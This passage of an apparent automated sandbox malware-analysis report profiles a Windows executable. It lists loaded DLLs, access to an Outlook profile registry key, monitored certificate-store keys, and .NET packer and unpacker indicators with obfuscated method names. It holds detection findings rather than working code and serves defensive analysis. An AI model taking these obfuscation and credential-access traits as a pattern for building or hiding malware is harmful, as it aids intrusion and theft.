                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: kP8EgMorTr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: kP8EgMorTr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 0.2.kP8EgMorTr.exe.52d0000.3.raw.unpack, DlRvq5yJkomY4LIf3S.cs.Net Code: X2WPMWey8AqqJOPa61l(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{X2WPMWey8AqqJOPa61l(typeof(IntPtr).TypeHandle),typeof(Type)})
                    .NET source code contains potential unpacker
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, rEpPJQV6URL37f8mXq.cs.Net Code: Wd1uQNpiCD System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, rEpPJQV6URL37f8mXq.cs.Net Code: Wd1uQNpiCD System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 0_2_06D0B5B4 pushad ; retn 0503h0_2_06D0DFE1
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 0_2_06D0F2D2 pushad ; iretd 0_2_06D0F2D9
                    Source: kP8EgMorTr.exeStatic PE information: section name: .text entropy: 7.7229254201155815
                    Source: 0.2.kP8EgMorTr.exe.52d0000.3.raw.unpack, DlRvq5yJkomY4LIf3S.csHigh entropy of concatenated method names: 'kZ9YdQeiiHN6iHHplRr', 'wEfHEVeR3qXSbOkcscO', 'RLbYs7foSU', 'PW2e71euAk0VMGlpcQV', 'gjVptie4PJx3mKSamWn', 'LKcyQ4eq4Fn8S34m92l', 'RgtTUJcyZL', 'TBNYf2t1gt', 'NdiYZfNUem', 'u6GYH5kC76'
                    Source: 0.2.kP8EgMorTr.exe.52d0000.3.raw.unpack, vH9V9oD7tIKkmfHnnj.csHigh entropy of concatenated method names: 'CO1Gqr7JX', 'O7OmLZJsW', 'AEjTXD5ed', 'DjTcZUKVY', 'V5WOgiNs3', 'ri688DDjg', 'pN9ncriqM', 'x0i4vkLXV', 'aFLjtabv9', 'zVDpUJsTO'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, BPHUtOLnNX1TNBBy6C.csHigh entropy of concatenated method names: 'K3fQgYY8j', 'ka0FMlhl4', 'jw2m99MGI', 'YO4aG1Suw', 'jxGOmMfj2', 'okei3u5IY', 'vamraAks3bJmkhrIoX', 'iIuV2FGe1s46oAihWj', 'R0nNM1hYE', 'pZpMOjvJX'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, jpTyGdIfYXfOSJg7u7.csHigh entropy of concatenated method names: 'J9FdC3ccIy', 'S7cdtaOdVM', 'ToString', 'wjtdW741PL', 'iMrd2RZGOI', 'hePd66akyl', 'DAhdTETKen', 'aZUd1REflp', 'G7Wd8Vh2Ke', 'KuodVBpFDr'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, ii9TbpDwVj4VyHwdew.csHigh entropy of concatenated method names: 'YvG802s7pe', 'Ajh87A2sQ5', 'VHy8QAPtTK', 'fjN8FNqGsn', 'gm18YUHuvA', 'scJ8mO97mK', 'Fy78aXOmXF', 'u9e8lgk9Zb', 'DFV8OtmrdG', 'lOA8iR08I3'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, wLVJRn6LhWfanhDX6u.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'uVGL3CVPcA', 'G8oLHsgqkH', 'HHvLzqinAA', 'eu2j4ZQ87x', 'L39jX5PeV8', 'XwnjLg1WtQ', 'IwHjjpN2iK', 'vZW3nTUuGN6F56Om4VE'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, PtJ2xmuqlD57FvXoff.csHigh entropy of concatenated method names: 'WJrX8gGUGa', 'YrgXVysDRf', 'GlgXCHMK4Z', 'eUFXt29ZxW', 'yHxXJfAJTV', 'jSOXAp6Grb', 'JJJnTwNVccM2G3YD0v', 'SeVrsjMZYAntyrPp5J', 'd85XXntW0X', 'AnLXjEmKvO'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, uJbwwqXuvhrFBcdg5rt.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UG4vrFVMeG', 'WRtvMiOeek', 'bG0voXTM6R', 'Aa5vvXdl3k', 'GYGvx0NZH8', 'zsrvex5JMs', 'yUHvsiaeUR'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, z2sVuFHhwOxq1ZhDsE.csHigh entropy of concatenated method names: 't9IM6bHCrP', 'gR7MTj4531', 'wXbM178TuF', 'H2CM8XI3TW', 'jxYMr1s8Tk', 'Ku2MVrGqUW', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, iDfM96fsdG8TI2V6rF.csHigh entropy of concatenated method names: 'ffQ8WFaqm3', 'jNF86u9Go3', 'cgH81TldHg', 'FaU1HYLEot', 'IFG1zresYV', 'RJi84d13kD', 'VSM8XjJsCp', 'sxT8LSjsIP', 'qEB8j8pGen', 'lbA8u4BNoI'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, mZrpi6z1Nfud5h9Fj2.csHigh entropy of concatenated method names: 'eUmMm4XOgM', 'jQ4Ml6MCnm', 'XfTMOEcQcc', 'T5sMKYj0ut', 'rs2MUZpOJe', 'oMFMZZ2D6t', 'fBwMPqixjh', 'iqbMsgHB3s', 'SXUM0vTCRQ', 'YvrM7LQZQs'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, q8O9oWg702N00qHtOJ.csHigh entropy of concatenated method names: 'Tj5rJA978L', 'DnQrd1S7lx', 'OhurrZAXfG', 'HOProU9x3i', 'LckrxMCvTi', 'jdBrsagEv1', 'Dispose', 'xylNWTUBi2', 'oInN2bUb48', 'cgkN6sCJv4'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, YIEg1T2LbG8rASQpNY.csHigh entropy of concatenated method names: 'Dispose', 'gN0X30qHtO', 'QjsLUMAG3B', 'VhuRWskjWd', 'oY4XHd4weK', 'Hw7XzY7Xfe', 'ProcessDialogKey', 'eYOL4h8slI', 'eIOLXYe0xE', 'eomLL72sVu'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, J8fA5lqdJSJ8cqu8Vd.csHigh entropy of concatenated method names: 'ToString', 'EEOAbrY5LP', 'dDWAUcO1Aw', 'vcjAyoFttX', 'PwtAZxuE4r', 'LoSAPC6GId', 'ziWA9VcEpb', 'dJRAfaNP9J', 'a1IAn7knBs', 'rbbADTS7r6'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, lbcVD2GDTHB2oaAfub.csHigh entropy of concatenated method names: 'fSGRlDEoR5', 'DjJROZcRAC', 'I50RKQGHKI', 'nh4RUkhxti', 'WiVRZxMlpC', 'CugRPCJ2MU', 'ECVRfUT0Wg', 'haNRnyV4Pb', 'dvFRE3oHkK', 'xSwRbmbmJV'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, oh4SCQX4gNWAD6iyPoO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oBaMbiwpiq', 'rPHMkVb8gZ', 'DTbMGKGHvO', 'tJKMhdtHNI', 'y4MM52lr6h', 'd5AMqSFUQG', 'LpVMI6KlLv'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, rgGUGalHrgysDRf4jP.csHigh entropy of concatenated method names: 'oFu2h8uyps', 'npY25mNrA1', 'GHG2qbLVuj', 'lQi2IjLnB4', 'rbt2BIpvDm', 'r2H2wPjPwn', 'cFe2gvK0uA', 'dgs2SfM4VI', 'cob239Q0IR', 'UIM2HrBxnP'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, KZxW7jiH22LPS7HxfA.csHigh entropy of concatenated method names: 'C7CTYuGwSV', 'xuPTav8CGg', 'nfS6yDl0oS', 'z4D6ZIxuNT', 'hHQ6PnmaGa', 'FPj69r5pRG', 'yw06fbZkMw', 'dDg6nwnsYi', 'CO76DyJrTZ', 'B5K6Eh33av'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, rEpPJQV6URL37f8mXq.csHigh entropy of concatenated method names: 'aQMjpC0BfE', 'BEwjWhbKLR', 'nZ9j2gO2FO', 'Cvfj6cgehK', 'LWbjTl3AJK', 'FOGj1YEaLo', 'TKSj8iBIQ9', 'ERXjVP7NV9', 'HtLjcvfFCt', 'YNwjC6lMdF'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, ClNdkUXX0RfnYApgJkn.csHigh entropy of concatenated method names: 'h7gMHM77eF', 'JitMzDnVDJ', 'fPCo4LA2L1', 'd6YoX52FeU', 'kKQoLUww1l', 'CL2ojKNyb3', 'lefouXfFfd', 'cmjopIWKyl', 'SXWoWZY9ZB', 'J73o2HdkaI'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, Bwb3C9wDBap2ZIO8VC.csHigh entropy of concatenated method names: 'zi5dSNYNm0', 'lbidHAvlvu', 'XcIN4tFy3e', 'KxONXLOsCv', 'eRtdbmHk5u', 'YIudkHDhu7', 'aHxdGYs6Ht', 'b3idhiAm7i', 'OFxd5PPwo9', 'dIedq4JGpX'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, wnMmFUOlgHMK4ZpUF2.csHigh entropy of concatenated method names: 'tnL6FGbpR5', 'obA6m9CqKF', 'Cd76lib8k0', 'UvE6OeHVNP', 'uwx6J2n3kH', 'LvT6AE1FJ5', 'BsM6drVp3f', 'Xcf6NhIrPx', 'SSw6rmUQCT', 'y086MPlDAQ'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, oTV8SOKp6GrbJLE30p.csHigh entropy of concatenated method names: 'PTj1pt1nGi', 'nOF122n6hA', 'Jyw1Tv10So', 'Vuo185TEKD', 'tEZ1Vp1YV0', 'kEETBFKgEV', 'eaiTwqM1k8', 'dGHTgK89SH', 'ipmTSYNYTC', 'GRbT3Ni3Eu'
                    Source: 0.2.kP8EgMorTr.exe.6d10000.4.raw.unpack, Eh8slI3pIOYe0xEpom.csHigh entropy of concatenated method names: 'bt0rKUcxNd', 'jgRrUIDD5l', 'N73ry8taI9', 'iJfrZVHc12', 'dDhrPXerof', 'C2cr9tyPr3', 'RaMrf6QabY', 'h47rnFwXqm', 'XILrDaHOKo', 'HcYrEpYsuM'
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, BPHUtOLnNX1TNBBy6C.csHigh entropy of concatenated method names: 'K3fQgYY8j', 'ka0FMlhl4', 'jw2m99MGI', 'YO4aG1Suw', 'jxGOmMfj2', 'okei3u5IY', 'vamraAks3bJmkhrIoX', 'iIuV2FGe1s46oAihWj', 'R0nNM1hYE', 'pZpMOjvJX'
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, jpTyGdIfYXfOSJg7u7.csHigh entropy of concatenated method names: 'J9FdC3ccIy', 'S7cdtaOdVM', 'ToString', 'wjtdW741PL', 'iMrd2RZGOI', 'hePd66akyl', 'DAhdTETKen', 'aZUd1REflp', 'G7Wd8Vh2Ke', 'KuodVBpFDr'
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, ii9TbpDwVj4VyHwdew.csHigh entropy of concatenated method names: 'YvG802s7pe', 'Ajh87A2sQ5', 'VHy8QAPtTK', 'fjN8FNqGsn', 'gm18YUHuvA', 'scJ8mO97mK', 'Fy78aXOmXF', 'u9e8lgk9Zb', 'DFV8OtmrdG', 'lOA8iR08I3'
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, wLVJRn6LhWfanhDX6u.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'uVGL3CVPcA', 'G8oLHsgqkH', 'HHvLzqinAA', 'eu2j4ZQ87x', 'L39jX5PeV8', 'XwnjLg1WtQ', 'IwHjjpN2iK', 'vZW3nTUuGN6F56Om4VE'
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, PtJ2xmuqlD57FvXoff.csHigh entropy of concatenated method names: 'WJrX8gGUGa', 'YrgXVysDRf', 'GlgXCHMK4Z', 'eUFXt29ZxW', 'yHxXJfAJTV', 'jSOXAp6Grb', 'JJJnTwNVccM2G3YD0v', 'SeVrsjMZYAntyrPp5J', 'd85XXntW0X', 'AnLXjEmKvO'
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, uJbwwqXuvhrFBcdg5rt.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UG4vrFVMeG', 'WRtvMiOeek', 'bG0voXTM6R', 'Aa5vvXdl3k', 'GYGvx0NZH8', 'zsrvex5JMs', 'yUHvsiaeUR'
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, z2sVuFHhwOxq1ZhDsE.csHigh entropy of concatenated method names: 't9IM6bHCrP', 'gR7MTj4531', 'wXbM178TuF', 'H2CM8XI3TW', 'jxYMr1s8Tk', 'Ku2MVrGqUW', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, iDfM96fsdG8TI2V6rF.csHigh entropy of concatenated method names: 'ffQ8WFaqm3', 'jNF86u9Go3', 'cgH81TldHg', 'FaU1HYLEot', 'IFG1zresYV', 'RJi84d13kD', 'VSM8XjJsCp', 'sxT8LSjsIP', 'qEB8j8pGen', 'lbA8u4BNoI'
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, mZrpi6z1Nfud5h9Fj2.csHigh entropy of concatenated method names: 'eUmMm4XOgM', 'jQ4Ml6MCnm', 'XfTMOEcQcc', 'T5sMKYj0ut', 'rs2MUZpOJe', 'oMFMZZ2D6t', 'fBwMPqixjh', 'iqbMsgHB3s', 'SXUM0vTCRQ', 'YvrM7LQZQs'
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, q8O9oWg702N00qHtOJ.csHigh entropy of concatenated method names: 'Tj5rJA978L', 'DnQrd1S7lx', 'OhurrZAXfG', 'HOProU9x3i', 'LckrxMCvTi', 'jdBrsagEv1', 'Dispose', 'xylNWTUBi2', 'oInN2bUb48', 'cgkN6sCJv4'
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, YIEg1T2LbG8rASQpNY.csHigh entropy of concatenated method names: 'Dispose', 'gN0X30qHtO', 'QjsLUMAG3B', 'VhuRWskjWd', 'oY4XHd4weK', 'Hw7XzY7Xfe', 'ProcessDialogKey', 'eYOL4h8slI', 'eIOLXYe0xE', 'eomLL72sVu'
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, J8fA5lqdJSJ8cqu8Vd.csHigh entropy of concatenated method names: 'ToString', 'EEOAbrY5LP', 'dDWAUcO1Aw', 'vcjAyoFttX', 'PwtAZxuE4r', 'LoSAPC6GId', 'ziWA9VcEpb', 'dJRAfaNP9J', 'a1IAn7knBs', 'rbbADTS7r6'
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, lbcVD2GDTHB2oaAfub.csHigh entropy of concatenated method names: 'fSGRlDEoR5', 'DjJROZcRAC', 'I50RKQGHKI', 'nh4RUkhxti', 'WiVRZxMlpC', 'CugRPCJ2MU', 'ECVRfUT0Wg', 'haNRnyV4Pb', 'dvFRE3oHkK', 'xSwRbmbmJV'
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, oh4SCQX4gNWAD6iyPoO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oBaMbiwpiq', 'rPHMkVb8gZ', 'DTbMGKGHvO', 'tJKMhdtHNI', 'y4MM52lr6h', 'd5AMqSFUQG', 'LpVMI6KlLv'
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, rgGUGalHrgysDRf4jP.csHigh entropy of concatenated method names: 'oFu2h8uyps', 'npY25mNrA1', 'GHG2qbLVuj', 'lQi2IjLnB4', 'rbt2BIpvDm', 'r2H2wPjPwn', 'cFe2gvK0uA', 'dgs2SfM4VI', 'cob239Q0IR', 'UIM2HrBxnP'
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, KZxW7jiH22LPS7HxfA.csHigh entropy of concatenated method names: 'C7CTYuGwSV', 'xuPTav8CGg', 'nfS6yDl0oS', 'z4D6ZIxuNT', 'hHQ6PnmaGa', 'FPj69r5pRG', 'yw06fbZkMw', 'dDg6nwnsYi', 'CO76DyJrTZ', 'B5K6Eh33av'
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, rEpPJQV6URL37f8mXq.csHigh entropy of concatenated method names: 'aQMjpC0BfE', 'BEwjWhbKLR', 'nZ9j2gO2FO', 'Cvfj6cgehK', 'LWbjTl3AJK', 'FOGj1YEaLo', 'TKSj8iBIQ9', 'ERXjVP7NV9', 'HtLjcvfFCt', 'YNwjC6lMdF'
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, ClNdkUXX0RfnYApgJkn.csHigh entropy of concatenated method names: 'h7gMHM77eF', 'JitMzDnVDJ', 'fPCo4LA2L1', 'd6YoX52FeU', 'kKQoLUww1l', 'CL2ojKNyb3', 'lefouXfFfd', 'cmjopIWKyl', 'SXWoWZY9ZB', 'J73o2HdkaI'
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, Bwb3C9wDBap2ZIO8VC.csHigh entropy of concatenated method names: 'zi5dSNYNm0', 'lbidHAvlvu', 'XcIN4tFy3e', 'KxONXLOsCv', 'eRtdbmHk5u', 'YIudkHDhu7', 'aHxdGYs6Ht', 'b3idhiAm7i', 'OFxd5PPwo9', 'dIedq4JGpX'
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, wnMmFUOlgHMK4ZpUF2.csHigh entropy of concatenated method names: 'tnL6FGbpR5', 'obA6m9CqKF', 'Cd76lib8k0', 'UvE6OeHVNP', 'uwx6J2n3kH', 'LvT6AE1FJ5', 'BsM6drVp3f', 'Xcf6NhIrPx', 'SSw6rmUQCT', 'y086MPlDAQ'
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, oTV8SOKp6GrbJLE30p.csHigh entropy of concatenated method names: 'PTj1pt1nGi', 'nOF122n6hA', 'Jyw1Tv10So', 'Vuo185TEKD', 'tEZ1Vp1YV0', 'kEETBFKgEV', 'eaiTwqM1k8', 'dGHTgK89SH', 'ipmTSYNYTC', 'GRbT3Ni3Eu'
                    Source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, Eh8slI3pIOYe0xEpom.csHigh entropy of concatenated method names: 'bt0rKUcxNd', 'jgRrUIDD5l', 'N73ry8taI9', 'iJfrZVHc12', 'dDhrPXerof', 'C2cr9tyPr3', 'RaMrf6QabY', 'h47rnFwXqm', 'XILrDaHOKo', 'HcYrEpYsuM'
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
